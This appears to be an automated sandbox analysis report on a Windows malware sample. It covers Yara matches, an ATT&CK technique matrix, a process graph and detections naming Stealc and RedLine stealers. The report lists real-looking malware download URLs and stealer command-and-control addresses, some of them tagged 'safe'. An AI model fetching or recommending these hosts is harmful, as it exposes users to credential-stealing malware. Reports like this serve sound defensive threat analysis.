                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cb30000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101749f0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272101eeb15.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.2927299944.000002727CC40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000000.2111483520.0000027276AEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                          Source: Yara matchFile source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED
                          Source: Yara matchFile source: 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.272100c6ca8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b94dad.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ed432f.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b847a3.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ead525.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27279ef8739.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.27276b7537d.6.raw.unpack, type: UNPACKEDPE
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C940C40 sqlite3_bind_zeroblob,1_2_6C940C40
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C940D60 sqlite3_bind_parameter_name,1_2_6C940D60
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6C868EA0 sqlite3_clear_bindings,1_2_6C868EA0
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                          Windows Management Instrumentation
                          11
                          DLL Side-Loading
                          1
                          Abuse Elevation Control Mechanism
                          11
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          13
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts11
                          Native API
                          1
                          Windows Service
                          11
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol4
                          Data from Local System
                          22
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)1
                          Windows Service
                          1
                          Abuse Elevation Control Mechanism
                          Security Account Manager3
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
                          Process Injection
                          3
                          Obfuscated Files or Information
                          NTDS289
                          System Information Discovery
                          Distributed Component Object Model1
                          Email Collection
                          4
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                          Software Packing
                          LSA Secrets551
                          Security Software Discovery
                          SSHKeylogging125
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                          DLL Side-Loading
                          Cached Domain Credentials351
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                          Masquerading
                          DCSync13
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                          Process Injection
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432361 Sample: wxfSIz4PAi.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 85 download.iolo.net 2->85 87 westus2-2.in.applicationinsights.azure.com 2->87 89 7 other IPs or domains 2->89 125 Snort IDS alert for network traffic 2->125 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 131 17 other signatures 2->131 9 wxfSIz4PAi.exe 3 11 2->9         started        14 run.exe 2->14         started        signatures3 process4 dnsIp5 91 185.172.128.90, 49730, 80 NADYMSS-ASRU Russian Federation 9->91 93 185.172.128.228, 49731, 80 NADYMSS-ASRU Russian Federation 9->93 95 2 other IPs or domains 9->95 69 C:\Users\user\AppData\Local\Temp\u5ek.3.exe, PE32 9->69 dropped 71 C:\Users\user\AppData\Local\Temp\...\run.exe, PE32 9->71 dropped 73 C:\Users\user\AppData\Local\...\relay.dll, PE32 9->73 dropped 75 2 other malicious files 9->75 dropped 133 Detected unpacking (overwrites its own PE header) 9->133 16 u5ek.0.exe 57 9->16         started        21 run.exe 6 9->21         started        23 u5ek.3.exe 20 8 9->23         started        25 WerFault.exe 21 16 9->25         started        135 Maps a DLL or memory area into another process 14->135 137 Found direct / indirect Syscall (likely to bypass EDR) 14->137 27 cmd.exe 14->27         started        file6 signatures7 process8 dnsIp9 77 185.172.128.76, 49733, 80 NADYMSS-ASRU Russian Federation 16->77 79 185.172.128.203 NADYMSS-ASRU Russian Federation 16->79 53 C:\Users\user\AppData\...GIJKEHCAK.exe, PE32 16->53 dropped 55 C:\Users\user\AppData\Local\...\tiktok[1].exe, PE32 16->55 dropped 57 C:\Users\user\AppData\...\softokn3[1].dll, PE32 16->57 dropped 65 11 other files (7 malicious) 16->65 dropped 97 Detected unpacking (changes PE section rights) 16->97 99 Detected unpacking (overwrites its own PE header) 16->99 101 Tries to steal Mail credentials (via file / registry access) 16->101 111 8 other signatures 16->111 29 cmd.exe 16->29         started        31 WerFault.exe 16->31         started        59 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 21->59 dropped 61 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 21->61 dropped 103 Maps a DLL or memory area into another process 21->103 105 Found direct / indirect Syscall (likely to bypass EDR) 21->105 33 cmd.exe 4 21->33         started        81 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->81 107 Checks if the current machine is a virtual machine (disk enumeration) 23->107 37 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 23->37         started        63 C:\Users\user\AppData\Local\Temp\xtfky, PE32 27->63 dropped 109 Writes to foreign memory regions 27->109 39 conhost.exe 27->39         started        41 MSBuild.exe 27->41         started        file10 signatures11 process12 file13 43 EGIJKEHCAK.exe 29->43         started        46 conhost.exe 29->46         started        67 C:\Users\user\AppData\Local\Temp\jwjqeqx, PE32 33->67 dropped 113 Writes to foreign memory regions 33->113 115 Found hidden mapped module (file has been removed from disk) 33->115 117 Maps a DLL or memory area into another process 33->117 48 MSBuild.exe 5 33->48         started        51 conhost.exe 33->51         started        119 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->119 121 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->121 123 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->123 signatures14 process15 dnsIp16 139 Multi AV Scanner detection for dropped file 43->139 83 91.215.85.66 PINDC-ASRU Russian Federation 48->83 141 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 48->141 143 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 48->143 145 Tries to harvest and steal browser information (history, passwords, etc) 48->145 signatures17

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          wxfSIz4PAi.exe45%ReversingLabsWin32.Trojan.Generic
                          wxfSIz4PAi.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\jwjqeqx100%AviraHEUR/AGEN.1307453
                          C:\Users\user\AppData\Local\Temp\u5ek.0.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\jwjqeqx100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe47%ReversingLabsWin32.Spyware.Stealc
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe47%ReversingLabsWin32.Spyware.Stealc
                          C:\Users\user\AppData\Local\Temp\jwjqeqx65%ReversingLabsByteCode-MSIL.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u5ek.3.exe4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\xtfky65%ReversingLabsByteCode-MSIL.Trojan.RedLine
                          C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Roaming\SecureClient\relay.dll0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://www.indyproject.org/0%URL Reputationsafe
                          https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts0%URL Reputationsafe
                          https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B0%URL Reputationsafe
                          http://ocsp.sectigo.com00%URL Reputationsafe
                          https://sectigo.com/CPS0D0%URL Reputationsafe
                          http://185.172.128.228/BroomSetup.exe0%Avira URL Cloudsafe
                          http://185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                          http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/freebl3.dllA0%Avira URL Cloudsafe
                          http://185.172.128.203/tiktok.exe6=0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/mozglue.dllo0%Avira URL Cloudsafe
                          http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/freebl3.dllE0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/softokn3.dll0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/sqlite3.dll0%Avira URL Cloudsafe
                          http://185.172.128.59/syncUpd.exe100%Avira URL Cloudmalware
                          http://185.172.128.76/3cd2b41cbde8fc9c.php(;T0%Avira URL Cloudsafe
                          http://185.172.128.760%Avira URL Cloudsafe
                          http://185.172.128.76/3cd2b41cbde8fc9c.phpad32c124f7c2674f26e5e63942ecbrelease05bfdde8fa3fa3eef0df8c0%Avira URL Cloudsafe
                          http://185.172.128.228/ping.php?substr=two100%Avira URL Cloudmalware
                          https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/nss3.dll0%Avira URL Cloudsafe
                          http://185.172.128.203/tiktok.exe100%Avira URL Cloudmalware
                          http://185.172.128.76/15f649199f40275b/mozglue.dll0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/softokn3.dllY0%Avira URL Cloudsafe
                          http://185.172.128.76/15f649199f40275b/msvcp140.dll0%Avira URL Cloudsafe
                          http://185.172.128.203/tiktok.exe000%Avira URL Cloudsafe
                          http://185.172.128.76/3cd2b41cbde8fc9c.phpO0%Avira URL Cloudsafe
                          http://note.padd.cn.com/1/Package.zip0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          iolo0.b-cdn.net
                          195.181.163.193
                          truefalse
                            high
                            note.padd.cn.com
                            176.97.76.106
                            truefalse
                              unknown
                              svc.iolo.com
                              20.157.87.45
                              truefalse
                                high
                                fp2e7a.wpc.phicdn.net
                                192.229.211.108
                                truefalse
                                  unknown
                                  download.iolo.net
                                  unknown
                                  unknowntrue
                                    unknown
                                    westus2-2.in.applicationinsights.azure.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      http://185.172.128.228/BroomSetup.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/sqlite3.dlltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/softokn3.dlltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.59/syncUpd.exefalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://185.172.128.228/ping.php?substr=twofalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/nss3.dlltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/mozglue.dlltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.203/tiktok.exefalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/msvcp140.dlltrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://svc.iolo.com/__svc/sbv/DownloadManager.ashxfalse
                                        high
                                        http://note.padd.cn.com/1/Package.zipfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabu5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=u5ek.0.exe, 00000001.00000003.1759189708.000000000439B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003726000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.00000000032B9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003323000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2875147556.0000000003784000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://monitor.azure.com//.defaultSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.vmware.com/0run.exe, 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://snapshot.monitor.azure.com/&SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.u5ek.3.exe, 00000006.00000003.2249141509.0000000002606000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.0000000002669000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.00000000026A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://www.iolo.com/company/legal/sales-policy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.indyproject.org/wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000003.2249141509.0000000002662000.00000004.00001000.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.iolo.com/support/solutions/articles/44001781185?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://www.iolo.com/company/legal/privacy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            high
                                                            http://www.codeplex.com/CompositeWPFSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.iolo.com/support/solutions/articles/44001781185SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://scripts.sil.org/OFLSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://185.172.128.76/15f649199f40275b/freebl3.dllAu5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://taskscheduler.codeplex.com/HSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                    high
                                                                    https://www.iolo.com/company/legal/sales-policy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://scripts.sil.org/OFLX8SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://westus2-2.in.applicationinsights.azure.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alertsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000D.00000002.2875147556.0000000003201000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://indiantypefoundry.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950490595.000002727F082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://download.avira.com/download/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModelSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://dejavu.sourceforge.netSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.mozilla.com/en-US/blocklist/u5ek.0.exe, u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpfalse
                                                                                      high
                                                                                      https://www.iolo.com/company/legal/privacy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200001000.00000004.00000800.00020000.00000000.sdmpfalse
